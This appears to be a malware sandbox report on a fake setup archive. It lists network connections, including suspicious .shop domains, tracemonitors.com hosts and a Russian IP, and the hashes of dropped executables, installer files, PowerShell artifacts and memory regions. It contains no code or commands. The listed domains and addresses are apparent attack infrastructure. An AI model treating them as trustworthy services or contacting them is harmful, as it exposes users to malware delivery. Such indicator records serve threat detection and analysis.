GB 142.250.200.46:443 google.com tcp
US 104.17.24.14:443 cdnjs.cloudflare.com tcp
US 104.17.24.14:443 cdnjs.cloudflare.com tcp
GB 142.250.180.4:443 www.google.com tcp
GB 142.250.180.4:443 www.google.com udp
GB 142.250.180.4:443 www.google.com udp
US 35.190.80.1:443 a.nel.cloudflare.com tcp
US 35.190.80.1:443 a.nel.cloudflare.com udp
US 104.17.24.14:443 cdnjs.cloudflare.com tcp
GB 142.250.200.46:443 google.com udp
US 104.21.70.174:443 senzamenuzaes.shop tcp
US 104.21.74.224:80 soneservice.shop tcp
US 104.21.74.224:80 soneservice.shop tcp
NL 149.154.167.99:443 t.me tcp
NL 149.154.167.99:443 t.me tcp
NL 149.154.167.99:443 t.me tcp
US 34.111.108.175:443 cdn5.cdn-telegram.org tcp
NL 149.154.167.99:443 t.me tcp
NL 149.154.167.99:443 t.me tcp
NL 149.154.167.99:443 t.me tcp
NL 149.154.167.99:443 t.me tcp
NL 149.154.167.99:443 t.me tcp
US 104.21.74.224:80 soneservice.shop tcp
US 104.21.74.224:80 soneservice.shop tcp
US 104.21.74.224:80 soneservice.shop tcp
US 104.21.73.21:443 z3n.mom tcp
RU 95.163.241.63:80 95.163.241.63 tcp
US 104.21.74.224:80 soneservice.shop tcp
US 104.21.74.224:80 soneservice.shop tcp
NL 185.26.182.112:443 net.geo.opera.com tcp
US 198.54.117.242:443 slatevision.org tcp
US 104.21.74.224:80 soneservice.shop tcp
US 104.21.74.224:80 soneservice.shop tcp
US 35.190.80.1:443 a.nel.cloudflare.com udp
US 198.54.117.242:443 slatevision.org tcp
US 104.21.74.224:80 soneservice.shop tcp
US 104.21.74.224:80 soneservice.shop tcp
US 198.54.117.242:443 slatevision.org tcp
US 104.21.74.224:80 soneservice.shop tcp
US 198.54.117.242:443 slatevision.org tcp
US 104.21.74.224:80 soneservice.shop tcp
NL 82.145.216.20:443 autoupdate.geo.opera.com tcp
NL 82.145.216.20:443 autoupdate.geo.opera.com tcp
NL 82.145.217.121:443 desktop-netinstaller-sub.osp.opera.software tcp
NL 82.145.216.23:443 download.opera.com tcp
NL 82.145.216.16:443 features.opera-api2.com tcp
US 104.18.10.89:443 download5.operacdn.com tcp
NL 82.145.217.121:443 desktop-netinstaller-sub.osp.opera.software tcp
US 104.21.74.224:80 soneservice.shop tcp
US 54.210.117.250:443 service-domain.xyz tcp
GB 142.250.200.14:443 clients2.google.com tcp
GB 142.250.187.225:443 clients2.googleusercontent.com tcp
GB 142.250.200.14:443 clients2.google.com tcp
US 172.67.164.12:80 soneservice.shop tcp
US 44.237.52.63:80 api4.tracemonitors.com tcp
NL 149.154.167.99:443 t.me tcp
US 172.67.211.171:443 ify.ac tcp
US 44.237.52.63:443 api4.tracemonitors.com tcp
KZ 185.22.66.15:80 www.rapidfilestorage.com tcp
KZ 185.22.66.15:80 www.rapidfilestorage.com tcp
US 104.21.20.211:443 oasqi.nxt-psh.com tcp
US 104.21.20.211:443 oasqi.nxt-psh.com tcp
RU 80.78.240.92:80 rfiles3.tracemonitors.com tcp
RU 87.250.251.119:443 mc.yandex.com tcp
RU 80.78.240.92:443 rfiles3.tracemonitors.com tcp
RU 80.78.240.92:443 rfiles3.tracemonitors.com tcp
RU 80.78.240.92:443 rfiles3.tracemonitors.com tcp
US 104.21.67.200:443 soneremonasez.shop tcp
GB 20.90.153.243:443 client.wns.windows.com tcp
GB 142.250.180.4:443 www.google.com udp
GB 142.250.180.4:443 www.google.com tcp
GB 142.250.180.4:443 www.google.com udp
GB 142.250.180.4:443 www.google.com tcp
US 35.190.80.1:443 a.nel.cloudflare.com udp
US 44.240.96.128:443 api4.tracemonitors.com tcp
US 44.240.96.128:443 api4.tracemonitors.com tcp
US 35.190.80.1:443 a.nel.cloudflare.com udp

Files

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 8b0c53c5fe6ad2ee4ffbde1b3384d027
SHA1 0c9ae4f75a65ed95159b6eb75c3c7b48971f3e71
SHA256 2e9fc3b050296902d0bb0ce6b8acc0bb54440f75f54f1f04ae95c9956108171f
SHA512 29f62e085d685d3b4902515790ab4f298454d0f8d53b6234fae9f9a0edffdd0d4edee57261e8eb0b94a4af8e86d3f7ab8b044c6f259576b89f91183002e58b42

\??\pipe\LOCAL\crashpad_5116_MCFATMWUYCYYCVIM

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 afe63f44aa3aa9393e4251b4b74226e3
SHA1 29eef15e4d60afed127861deebc7196e97d19e4a
SHA256 7787181844d106768f78847869b5e784f07c1b65109d59b46932979bac823cd3
SHA512 f0f7951b5d55c2cbb71add5ab0c2ed3617a6fdf93f2c81ee9dd15d9f7c67881b42cbfd97cc4d2f17ba8a383624b23da1897fee069ddcee34233c1f625062a1cb

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 5e1229779e5e46e5ad7f260f6ee6509f
SHA1 2662f2eda39bd214d0a0346ba53e90692c9cefab
SHA256 92b9a18a36aa16b57d490764036ebf3ff4268e7580c52e1a9933797342f95188
SHA512 bde3892ad0dc8f99296ae66f4fd93f19189643ee54aa2c011a47bf70cd0de564e390e9bc5305f88e7adf5813003882cbc2a8bd77093c08e21e6bbffad558b075

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\File System\000\t\Paths\CURRENT

MD5 46295cac801e5d4857d09837238a6394
SHA1 44e0fa1b517dbf802b18faf0785eeea6ac51594b
SHA256 0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443
SHA512 8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database\MANIFEST-000001

MD5 5af87dfd673ba2115e2fcf5cfdb727ab
SHA1 d5b5bbf396dc291274584ef71f444f420b6056f1
SHA256 f9d31b278e215eb0d0e9cd709edfa037e828f36214ab7906f612160fead4b2b4
SHA512 de34583a7dbafe4dd0dc0601e8f6906b9bc6a00c56c9323561204f77abbc0dc9007c480ffe4092ff2f194d54616caf50aecbd4a1e9583cae0c76ad6dd7c2375b

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

MD5 206702161f94c5cd39fadd03f4014d98
SHA1 bd8bfc144fb5326d21bd1531523d9fb50e1b600a
SHA256 1005a525006f148c86efcbfb36c6eac091b311532448010f70f7de9a68007167
SHA512 0af09f26941b11991c750d1a2b525c39a8970900e98cba96fd1b55dbf93fee79e18b8aab258f48b4f7bda40d059629bc7770d84371235cdb1352a4f17f80e145

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 f127f06d500c12fbdc16bebec417b60a
SHA1 65698192f8dc0733012b4436f9cc1ecde0c4d137
SHA256 231a2214f8141332d07bf1a2486c7fc9ca3d640fea4d0d860e039185e0e81f85
SHA512 2ce019aa62e8646882e91561b044fb0655980822ef975e4a4fcd6e74da5d70e20b4bd91cdd09d87aa664b6e54565d911533907e1b23c0355c827e19cbab01184

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 f043b496be027386032973b34236b8d4
SHA1 505450769c078243448473ec87d795667d240c64
SHA256 1824e79423b34bc8665667d1e68ae97affd66533d5f28c14dd71aa3efd83f114
SHA512 e9b713fef295216bbe7a31c61ba94d00593d010c632a4f67c6a8d30e7898acbeb2175b710cad3b02a493855c97e7db38c0470d9b684bf063879cd93b7a57a8c3

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

MD5 846877711fcea90af80b6ebc2936be90
SHA1 6fe13d07f62c3f7b7bf8989e399dec12a7120612
SHA256 85da2e6f5ad3ba75da9085e7c632a34a2c1206d4df733da3da7a0127feff4ac9
SHA512 4bbb9e702113fd4074f13f5c3baf7307c32dd1396806a317bc39979b90a77c888a9791b0abe1b8cffc3880524286296c6c1f453793904cc2ee91d7719b4a5f37

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index~RFe57cd43.TMP

MD5 d1e699b661d18eea35cc542004d496c7
SHA1 f24ba4e263b7383563e0fe5477f4662a883e460d
SHA256 b2d4757755802b6afcca47d4595fd8713d3a75a30d6a7f4f05e84f71ed7cc11f
SHA512 fe834336d7614b19c49d888d3dffeedfc9d70889c043f4fb987779f9a32e3eb16149b9dd80cc399cef5294df8ca3cfcda69177c0b952b17a0d382f3712a6960c

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index

MD5 7c23d842b75a234d662e7a6d061b9d79
SHA1 29dd20d9b64a6c2f806321e4b813b06fe1371691
SHA256 cc974581d29ba504a43b45e1f6a53597f08e3f7ec448f3410fa8a938a4146a07
SHA512 3a62132b4f5a610062311b9c417d0eccd3f825ca954e9239096c49541db8723fcab9bb134235aba1b589aca883ad3645601dc50b6208a754cf5b9c29146024d2

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 09929d18cbc237159174a14d2e113631
SHA1 7c203e10373d0ed4e6658b48a154597af015d9fe
SHA256 1300d9e191218891c2bcf61852ef8c6cad4dcba3bf690b104c415380061580ac
SHA512 2ec803588f80c7aad12254971b91145b6e0d6d0003b58809f5f1e0f1391bc26c8008a877b901aeb58125d152ad8403f5b5e089aa01c48fa5d27e45a8e90f5c98

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 9697b4fce0931504d8a10f3d17f82fcd
SHA1 570a10b2478beb657699edc260d0aec55c49a790
SHA256 61202a3dcf04ff286f1d1c22b2b9bfd7dd6ea5c27ac967df46ea2c0cb2adb514
SHA512 705ee4ee26389f1db657f82860cbf1e56655db7e483be160234e4689ec81a300173f944cf3c3c700f3caf1898efe672cca162b50511b0791522dc56f9a3e63f1

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity~RFe580b36.TMP

MD5 cb8f5ea0dbb4f96a78d9e971de8457ea
SHA1 3590cc6ac1eacd3909c3275ae42e0eb508dea74b
SHA256 d65292b1c6ab470726b1ce9c1b8dd47c84619aba8600e1a9bd6525f2c3224eae
SHA512 998b767c50b0832441b5e91b876b22e2849b6f12d73970587040706ee54808f4c2bf59faa21e92ace52000eb13f3739bc1f0569653459458a1210b76049b9f0d

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\7185a1bc-67cb-4bfe-9134-bde345a99df8.tmp

MD5 568b1b3176b2ef78c5bf92882d81d239
SHA1 dd0bb9ad50efb2571450d40d03570c14c6bcf6f5
SHA256 eaf27de286063afe3ec4172b6619e611a067748c6b24ac5a7715fb32123410c2
SHA512 c4549f7bca2c3b7c2670bb5976448b5b4c7b21d94d9196a0399e5abbfe08ed561793b7ecbe4998a82480730349e2e9863ac7f6107abedb9981658220b2efe07d

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000008

MD5 151fb811968eaf8efb840908b89dc9d4
SHA1 7ec811009fd9b0e6d92d12d78b002275f2f1bee1
SHA256 043fd8558e4a5a60aaccd2f0377f77a544e3e375242e9d7200dc6e51f94103ed
SHA512 83aface0ab01da52fd077f747c9d5916e3c06b0ea5c551d7d316707ec3e8f3f986ce1c82e6f2136e48c6511a83cb0ac67ff6dc8f0e440ac72fc6854086a87674

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 53ea46dbd6b60a6cfdea0c350924dfb3
SHA1 186b9d2f48dea6b279e24b7c5eb21453b63a61de
SHA256 e7b2a685cb7d9d25bc92ccd5ae33f9664c0c951ca7e8afbeab103188e6f9738c
SHA512 99768cd1edc0564849961f0993904822f1f27b6c9b1001352925458e77506ec413149e5afa5c163795179c15ebb85db25cf19ee758722726138a0bc56ffdc521

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

MD5 4ea7fb0ffedbbbe097b34a1734771b27
SHA1 b5d55e909d348169162b76a45dd67ef2770cb84f
SHA256 6365f56d0b9fbfbf0fe758684b0d98e4aa2e93056efb268413bcb56fd87a8eb0
SHA512 2ec87c7c8f19a2789b0c8c100086b01588150a88ab9a0b6b7c5759ab90b095dfd52205a5ec8103a68a8e3759dce2fb322e32c4cba67baa55580944803b0ee188

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000009

MD5 c594a826934b9505d591d0f7a7df80b7
SHA1 c04b8637e686f71f3fc46a29a86346ba9b04ae18
SHA256 e664eef3d68ac6336a28be033165d4780e8a5ab28f0d90df1b148ef86babb610
SHA512 04a1dfdb8ee2f5fefa101d5e3ff36e87659fd774e96aa8c5941d3353ccc268a125822cf01533c74839e5f1c54725da9cc437d3d69b88e5bf3f99caccd4d75961

C:\Users\Admin\Downloads\setup_NUyyEY7ilu.zip

MD5 cac64ed2e120b9ef349315f044ea2cec
SHA1 47a5d926660edb2495652e039354dd9453fb30e9
SHA256 817b4d31af33dce7a8cca205dd6a2db4feb2cf1a9489ded2452482bef066e9d7
SHA512 41549098efa4a9cd5d2f20e2f0359dcad6ab63a4328872f9d5172d05295ba4388a3fbe6036b391bea14391d1352f6440a84f0f5f28087d6df885f3e156006fda

C:\Users\Admin\Downloads\setup_NUyyEY7ilu.zip:Zone.Identifier

MD5 be20faea74c1214ba8bd33286b96a83d
SHA1 e3f4ac85b5e95ebd3dcaa7d04db8481205ebbada
SHA256 ea649aeba3cf20a68c1370b962455d62978a1c3e652a7c66b042bc3db7f89b56
SHA512 e9adc1902d83c613ccdebedcc61de0f013ead73134974fbff3f9cfa10b26f4abd08a4d9fc8a5fcc7c3426263314f1edeeda5c81c20cd6f4b84a196778426d118

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 ea8bbcd1e030deb2b30de131421959a4
SHA1 02b15f7b3987d0a2bda6f938ad468635b660985e
SHA256 afb1970310770ab4850e77fc7f18257c3dcee62d26426632e2120f80978f8ba7
SHA512 0ea2a2809672e1dee98f732b6b3c03b6ee0b86bbc580e101508179f531665c8edd087bc9eccea8f502ecd2198cfbce692718c47c3b7432a4eb933d81c407e3a8

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

MD5 2096dc2f9304c28cb88a5a60e6f26655
SHA1 4d29bb5573b2baa4c5aeb7951819aadd06107eb0
SHA256 d5830b36f451a8288c16ad459c685283e272a83e6c3ae1f1a05f51021bfb1e19
SHA512 68a9d3021a21f3ea2e336ffecf665d58f1a46345164c1de46901500327b471c34cc33f784dea36946e4f6380a3ea1a296dff9ca63648093389f1596d398f3b80

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 6d7a81b882cfeb4ef5dfefd4f270c037
SHA1 0eee2cc765116a5acd4a99d950325f9dd1678f01
SHA256 aa13ce2440b6dc974946019fc43a0365087b8cc5d04398682b37ac83e8d59c03
SHA512 0c2d4e5ccf03c423600fe28183d1774e51bf13ad54c0f36444e674055d05b35799dcf31d3313b36c2d0b67160359ab19cddb5a18a8d01f0f8cde75aa15357ab5

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 9446eb5d861529ca55df862f178c4783
SHA1 1642458d1abea967484217a41590d833501f24b3
SHA256 829e2c88fb37b81088467eb46b7a588368ac48e7e8607f2fef0160b469c8c341
SHA512 2c0fbefbf4403fc0b8dd8b6962d1d3529d5af7897be12695b1f5b2b4728b69f1d5f077f6e504f1e4d797a69fe25c82b6afed99acf59a65d6247028f03ca353e2

memory/1056-319-0x0000000000400000-0x0000000000414000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\is-3ME7O.tmp\setup_NUyyEY7ilu.tmp

MD5 4b0524fa48ddc6b8d8191ef7a213b2e6
SHA1 d05ecb09aadbde153ad37c67db8b0206efa1fd37
SHA256 43af110947449a12b150169d107ff3d7cd103801e5dadf6485cdc719e185bde6
SHA512 4d29764c488281586dbcdb5eeb10a8924ab689ddc839b08b779c98e26eec8460aac531b156eafb937192bce486bee89bc117e47aa1ae4d7045ff72ff813d78bf

C:\Users\Admin\AppData\Local\Temp\is-172F4.tmp\_isetup\_iscrypt.dll

MD5 a69559718ab506675e907fe49deb71e9
SHA1 bc8f404ffdb1960b50c12ff9413c893b56f2e36f
SHA256 2f6294f9aa09f59a574b5dcd33be54e16b39377984f3d5658cda44950fa0f8fc
SHA512 e52e0aa7fe3f79e36330c455d944653d449ba05b2f9abee0914a0910c3452cfa679a40441f9ac696b3ccf9445cbb85095747e86153402fc362bb30ac08249a63

C:\Users\Admin\AppData\Local\CD To MP3 Converter\cd2mp3converter32_64.exe

MD5 7f2c34b6c0c8680f35a234077c40ee51
SHA1 e83cd07646f25afccda2ff63f7035d147268b264
SHA256 a8d33c8ae6df133bebbaebc079225aa6662cad3413a36feefe29c1ac6e3ce474
SHA512 8633680cd10b6ba33831c3962dceecef234b16b328c6f32dd1146a89b42738bdb02e91c1ebe2799e1a4f578050ee1d32b36cbcc92c0b26f0a28d59613a60014f

memory/4396-388-0x0000000000400000-0x0000000000D15000-memory.dmp

memory/4396-389-0x0000000000400000-0x0000000000D15000-memory.dmp

memory/3800-395-0x0000000000400000-0x00000000004BD000-memory.dmp

memory/1056-394-0x0000000000400000-0x0000000000414000-memory.dmp

memory/4396-396-0x0000000000400000-0x0000000000D15000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 75cab84940483a5af10229ddeeb37de5
SHA1 48e58f7cf100eebbebabba3f687e51662c5b0531
SHA256 cb6d9220526f73f9333f1cf4db44b9f37231721d0a37ab36a2d08537f63e3dd5
SHA512 2a30b850109ae5384e8c9fdd74f07f1dfd064bfe0dbdf1e315b6ad32563e1a05b7a4bcda912e61d81d4e313ca2038f0a9c592a321282bc10925f3dc98ae9bde6

memory/4616-441-0x0000000002290000-0x00000000022C6000-memory.dmp

memory/4616-442-0x0000000004D30000-0x000000000535A000-memory.dmp

memory/4616-443-0x0000000004CF0000-0x0000000004D12000-memory.dmp

memory/4616-444-0x00000000054D0000-0x0000000005536000-memory.dmp

memory/4616-445-0x00000000055B0000-0x0000000005616000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_15wyulhd.r1n.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/4616-454-0x0000000005620000-0x0000000005977000-memory.dmp

memory/4616-455-0x0000000005A90000-0x0000000005AAE000-memory.dmp

memory/4616-456-0x0000000005AD0000-0x0000000005B1C000-memory.dmp

memory/4616-457-0x00000000072D0000-0x000000000794A000-memory.dmp

memory/4616-458-0x0000000005FA0000-0x0000000005FBA000-memory.dmp

memory/4396-459-0x0000000000400000-0x0000000000D15000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\d3pdEIHF\nKCK4ZJZ894JRgKi.exe

MD5 0818da4635ebc7617bb20959ec058d27
SHA1 90a6e7822249c16e2b77afb164908b240b48ae4a
SHA256 082c308c0615523c0b5e9ed754cd5e6d84542c5de10be45325e6f9459026163f
SHA512 0855e2e306106c63d26028d467ee95625322fb3a58fbd6d6cf3257aa6f8e0c98f05b7dc861f130ffd5a2dc96019ab4e98a975a7c7bff3b148b538efc5a067d1b

C:\Users\Admin\AppData\Local\Temp\7zSCAD89F79\setup.exe

MD5 9f1b088ecc5e2f36939797060e8f5956
SHA1 78adf95b81e539d1450c61a8d135f5f836bcd4a9
SHA256 1caa0f7f2913218f5bcd069a52aad482396914780d89f77c6610b70b36dc1e13
SHA512 6bd73db75e7c7493ac6e03e745385641c4eccaeb1d8e96a2b157e1d4043d42990a05edd6702f28e25d4a25d4e39295739f1a6a6ccf89e629f6010ee8ebd66212

C:\Users\Admin\AppData\Local\Temp\Opera_installer_2407141758214892984.dll

MD5 82234053e684a16ea0b40a7f208f3233
SHA1 00381b28887a12f9ef8ee51cdbcc4320679ae88b
SHA256 23bda6025409f7e0a044b10644f4bace9772426312a969552931291306917c23
SHA512 be3235cc7d6ed941ced36cdc43a87ffae3b5163cacc12c2cbe6f320b6469d1c16d0bf2e42558df504d2c1a12d0234cfd187438830a59554696864a234de5f357

C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports\settings.dat

MD5 e237b96e4993cc7ca518e76d0d643f69
SHA1 7c87fdf56cd22e809387175766ceff64f492c1ee
SHA256 4d0f6603ca7c718678d72d239f9489734b6d31bde233e3f401b2e35173f0f5c9
SHA512 2f007a820e994548f269c49879806d216e8b4b4c59513686217fded3f6332859c0a9240cb08efb3a01f55e901c53546ea26b4d51f685d0fffd7ec0cfcd69f8ea

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

MD5 7eca2f8c66da277f6145e317e5268d79
SHA1 cbd5e403a3dae1ac2d3c601faab78ddfd55b0aad
SHA256 a66ca76bd55f7976f8f5ebca169e06ea88ef89d736a90277710a9fd62e95c07b
SHA512 dc5e7e81729d984e94fe113de27e75742d85bb97d855fdda2a82e704d022f6f8d889432be3a301392d1e27e26c4a541bffded9c5cc4117d541ca71b89cbcacef

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

MD5 c0636f2d138baca01dbb2eedb99bf3d5
SHA1 3b927899db0f3e2cb510782592887dc02fc3e400
SHA256 10973e727e5b0eb3f12aba60a682d66e79dfd86e4b6cfc454fd8df70c6e1fa8a
SHA512 0187a6ccb6428fb24ad4bc4ca14e7ce6f40ae6ca4f352f8e86a15288deb05cb4dd317ef8e9d04dc9ffb24407ecf0924af2c7910830c79366f7e4e48cb4b82b1d

memory/3988-546-0x0000000005590000-0x00000000058E7000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 877f5713ecf3e796d6f25b83edefa8e8
SHA1 1c7bbcb5d1d17bd1626ec5fbf4b1e55a4f588fb7
SHA256 0705accf76b8226aca95a7684f264c675a2f2ab9d545c7b0c21e853dc441056e
SHA512 6f0e39ee16dfc31dce679293897b30426d0bf584040df449276db765bc031bdb00df51b428d9907f29c01eabc330f2f3bd15e246219ef740371cacba2127f5a2

memory/3988-548-0x0000000005F80000-0x0000000005FCC000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\rC6Gx24s\IuIL6YzMXvff.exe

MD5 b22ba99456c105c277eb9056ca3f3485
SHA1 0db7280440aca3555f22a6ce8e6c4a7a0e38f142
SHA256 f86514113851b00bde75908f84847837191cf3de0548b2f478601707600f5000
SHA512 0a41feefb24c7bef8b04803eff1fedfb7a9775e63c6f5080c624eaec46e48dd8340b33df5c15a17245a6627f74994b2c22aa4a9eaf0f6b029d4891e66792b965

memory/4396-567-0x0000000000400000-0x0000000000D15000-memory.dmp

memory/4396-568-0x0000000000400000-0x0000000000D15000-memory.dmp

memory/1588-575-0x0000000010000000-0x00000000105E5000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202407141758221\additional_file0.tmp

MD5 dfe86cd1ab9fe5055dba3ead830574f6
SHA1 800ba6757bf301a918a800ce15a3853e3941e019
SHA256 f9cdff6fea65207cde93c637cca4b92939359ede3ac7337c2048e076085e7e5f
SHA512 d3d363a221a3fa7a010194965cb8cc7210aa17d81be094a3e8ee89bb2de684c3b874ce1c6c55e8109091a849874d05c1bae132d450dabe2597167782d0063570

C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202407141758221\assistant\assistant_installer.exe

MD5 a8c564c798ae8160230297d361952dd6
SHA1 34a45ee9eb7733ae9afbebb9f2951288a27f9df5
SHA256 3f48e5331890159921f7b65103c4b06bbf08552065718313761647d1648f8a64
SHA512 141ac3356a2fee32121231308cdd8afa5f76695185d66bba9fa977b66e5c6bad8bd4ea4656acdc743cd6b6f85c28a16626ab07f8b2c72652de82b4fb21c0bb54

C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202407141758221\assistant\dbghelp.dll

MD5 eeb07dc97790e8b075d6938759fe6ee1
SHA1 afb099be8ee28fef6488b5d253ba910b081a3b1b
SHA256 2808772ce1653cdf659f4781c718a9dd6f3ac547d52a1080462487baccaeaf78
SHA512 e541d839562c5045b5af0cc7ad2129393383df3fc528193cdef1a31ded4e894ffb8a02d34a009b3d6543d4987616534caaefa130a2b55ea73baf37ee0a294980

C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202407141758221\assistant\dbgcore.dll

MD5 ff0364394f7bc74d0c68040a5fbcda6f
SHA1 d19ce25e7d0e3043c377c5770b0f20cb42bd0295
SHA256 3bd944ca30b77f9ce8a1f503a7ee0dbcb77b92ae9fcd68907abe0ef2e9275053
SHA512 0676de1a65cc9c209f544e921f45c5eb8c5d42fb391ae1f370b0a2bedd26740f75f32ea5f17497d86e03edd6cf281ca51a7a54380a82de152d0e25a28297ccfd

memory/3804-626-0x00000000057F0000-0x0000000005B47000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 6dba3e67b051902745d4b2da2b8be5b9
SHA1 40f4d9f3de864c08ded81d27c552920c6a20b6f9
SHA256 a07f8d9d81e550774a222c1e98ff4f1a75e865374e1fcd5358eba75bbc1068e3
SHA512 a2d90987b62d15b0a8d0638bc96e49d607112f2e99460db3426086e1de06f5341c09a6b3b9418ea094e62b59541cb420b98b3136d3351354b382dd251212df90

memory/3804-628-0x0000000006280000-0x00000000062CC000-memory.dmp

memory/4396-642-0x0000000000400000-0x0000000000D15000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

MD5 812bb17e95be04edcde45e5f025cdce3
SHA1 54e42ace715ce9be05b7082c7c881fb0fb727a7e
SHA256 b5befd47f969de593323d458b17307e6be585bbf7a67bfa6cc24277980a57d31
SHA512 a83f3d1fb60eaa188141b289ea4a3b284431a4f0c5d04aee3f7b3e43182d217da671fe7ea6b3d038182036759dab91cd7731c9d2758e40d944788d7911f6d7f8

memory/4396-663-0x0000000000400000-0x0000000000D15000-memory.dmp

memory/4396-668-0x0000000000400000-0x0000000000D15000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 d8912901b4e9ec789b636fb92fea3bb1
SHA1 ad9f58edcf25235520208e6a102724241c374d77
SHA256 897f91fb69b4c55d7fb435b1745f102513b0bd3ce0e85b208e84ff0daff6b9a8
SHA512 499d7227f8e615630c1fdd2250976fbba7cab30221e2d9170b3c8642200729a510643451ded6798f004da9e18dfeb901e51c636360ab889134bdeb566aea9295

memory/2800-679-0x0000000010000000-0x00000000105E5000-memory.dmp

C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

MD5 5b74da6778ccaa0e1ca4ae7484775943
SHA1 0a2f6f315a0ca1a0366b509aec7b13c606645654
SHA256 172282931d7eeb60228e6b9b4b913fd78c73f2a7855620f35fb24a5c847b6c78
SHA512 20b4cb7174f49b22426b249f1dfc8f6273f50d1502536e773f4dcd073bf027f2a554d2437c2dc628dbe021c5c3b968b2d89f810ff1bb19630c1560e7feee1a1a

C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 a0bb6c6a8ba2ad5eaefe286840c54689
SHA1 84c98956a3fc10c31d69aaa732beb6e86715d781
SHA256 a61a13878c331bde4a5674366a87db1f4df54f539f19cb30818207f5960331b6
SHA512 9996040b7af3ca4c631dda2af37a33a379722b48be2bbe7d8d9bbcc9aa7998b1fda25fc8345c71fc50e727423260ffa90ba30cdaf5e33b2873e4ba5eb23ef1b2

memory/1540-703-0x0000000004B70000-0x0000000004BBC000-memory.dmp

memory/2516-707-0x000001121BB20000-0x000001121BB42000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 b25d4b4cdb5fb97d2cc0a7ee71e6d1e5
SHA1 7465eafe8958877b66396d55e457dda836ba029f
SHA256 f6e5421810ec512ec93de5cd6519e4a0bcfbe0a777c2c33ecd80bb62ae86489c
SHA512 d2dd122262039069b701ccfb30ce29ef5374eabed838c404ab89a6c2a5e6fe54ad144b6853753bc1478c97ddbb68e7e92cd5ce6619fec020bf7aa3994c6ea715

memory/3800-720-0x0000000000400000-0x00000000004BD000-memory.dmp

memory/4396-721-0x0000000000400000-0x0000000000D15000-memory.dmp

memory/4396-733-0x0000000000400000-0x0000000000D15000-memory.dmp

memory/1104-738-0x0000000010000000-0x00000000105E5000-memory.dmp

memory/1916-751-0x00000000055A0000-0x00000000055EC000-memory.dmp

memory/1104-760-0x0000000002390000-0x0000000002415000-memory.dmp

